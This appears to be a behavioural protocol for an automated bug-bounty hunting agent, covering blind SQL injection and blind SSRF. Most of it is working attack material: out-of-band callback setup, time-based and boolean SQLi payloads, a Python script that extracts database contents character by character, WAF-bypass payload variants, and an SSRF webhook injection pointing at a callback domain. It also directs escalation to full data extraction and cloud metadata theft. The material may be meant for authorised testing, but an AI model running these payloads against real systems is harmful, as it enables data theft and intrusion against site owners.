Blind Injection - Behavioral Protocol

Priority: OOB > time-based > boolean. Always try strongest evidence first.

Step 2: Set Up OOB Infrastructure (do this ONCE per hunt)

# Option A: BountyHound VPS (preferred during hunts)
python {AGENT}/engine/vps/vultr.py interactsh \
  --state {FINDINGS}/tmp/vps-state.json
# Returns: OOB_DOMAIN=abc123xyz.oast.fun

# Option B: Local interactsh
interactsh-client -json -o {FINDINGS}/tmp/oob-callbacks.json &
OOB_PID=$!

# Option C: ProxyEngine OOB (if proxy is running)
# mcp__proxy-engine__proxy_oob_generate()

Save the domain as {OOB}. Use unique subdomains per parameter: param-avatar.{OOB}, param-webhook.{OOB}.

Poll for callbacks:

# VPS
python {AGENT}/engine/vps/vultr.py poll --state {FINDINGS}/tmp/vps-state.json
# Local
cat {FINDINGS}/tmp/oob-callbacks.json

Callback received? Note source IP, path, timing. Proceed to injection-specific payloads below. No callback after 30s? Check troubleshooting (Section 8).

3. Blind SQL Injection

Time delay payloads (try all - whichever causes delay identifies DBMS)

Timing proof (mandatory - 3x baseline, 3x injected, 3x control):

for i in 1 2 3; do time curl -s "https://target.com/search?q=normal" > /dev/null; done
for i in 1 2 3; do time curl -s "https://target.com/search?q=1'+AND+SLEEP(5)--+-" > /dev/null; done
for i in 1 2 3; do time curl -s "https://target.com/search?q=1'+AND+SLEEP(0)--+-" > /dev/null; done

Delay avg >= 4.5s AND baseline < 1.0s AND no overlap? PROVEN. Otherwise try OOB.

Boolean extraction procedure

1. Confirm: ' AND 1=1-- - vs ' AND 1=2-- - - different response? Continue. Same? Skip boolean.
2. Extract DB name length: binary search with ' AND LENGTH(database())>N-- -
3. Extract chars: ' AND ASCII(SUBSTRING(database(),1,1))>N-- -

Extraction script (adapt TARGET and TRUE_LEN per target):

import requests, time

TARGET = "https://target.com/search"
TRUE_LEN = 4832
TOLERANCE = 50

def is_true(payload: str) -> bool:
    r = requests.get(TARGET, params={"q": payload})
    return abs(len(r.text) - TRUE_LEN) < TOLERANCE

def extract_string(query: str, max_len: int = 64) -> str:
    length = 0
    for i in range(1, max_len):
        if not is_true(f"' AND LENGTH(({query}))>{i}-- -"):
            length = i
            break
    result = ""
    for pos in range(1, length + 1):
        low, high = 32, 126
        while low < high:
            mid = (low + high) // 2
            if is_true(f"' AND ASCII(SUBSTRING(({query}),{pos},1))>{mid}-- -"):
                low = mid + 1
            else:
                high = mid
        result += chr(low)
        print(f"[+] {pos}: {chr(low)} -> {result}")
        time.sleep(0.3)
    return result

db_name = extract_string("SELECT database()")

OOB SQL injection (per DBMS)

Callback received with data? PROVEN - escalate to full extraction. No callback? Try next DBMS payload.

WAF bypass variants

'/*!50000AND*/SLEEP(5)-- -
' AnD sLeEp(5)-- -
'%09AND%09SLEEP(5)-- -
%2527%2520AND%2520SLEEP(5)--%2520-

Bypassed WAF? Document which technique worked in defenses.md.

4. Blind SSRF

Procedure

1. Identify sinks - test these parameter types FIRST:

2. Inject OOB URL with unique subdomain per parameter:

curl -s -X POST https://target.com/api/settings \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"webhook_url": "http://param-webhook.{OOB}/ssrf"}'

3. Check callback - got it? Note source IP, User-Agent, headers. SSRF confirmed.
   • Source IP in private range? Internal network access - escalate to @cloud skill for metadata theft.
   • No callback? Try URL format variants below, then timing differential.

URL format variants (try if standard URL is filtered)